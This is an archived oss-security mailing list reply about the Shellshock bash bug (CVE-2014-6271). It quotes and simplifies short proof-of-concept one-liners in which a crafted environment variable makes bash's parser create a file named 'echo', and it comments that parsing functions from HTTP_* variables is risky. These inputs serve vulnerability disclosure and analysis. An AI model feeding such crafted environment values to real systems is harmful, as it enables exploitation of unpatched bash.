Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 24 Sep 2014 15:37:03 -0700
From: Michal Zalewski <>
Cc: Tavis Ormandy <>
Subject: Re: CVE-2014-6271: remote code execution through bash

> Tavis Ormandy just tweetet this:

> $ env X='() { (a)=>\' sh -c "echo date"; cat echo

This can be simplified as:

$ X='() { function a a>\' bash -c echo
$ ls echo

And the core parsing problem is illustrated by this:

$ function a a>\ [RETURN]
> foo
$ whatever
$ ls

Tavis and I spent a fair amount of time trying to figure out if this
poses a more immediate risk, but so far, no dice. It strongly suggests
that the parser is fragile and that there may be unexpected side
effects, though; parsing functions seen in HTTP_* and such seems like
a very risky proposition.


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ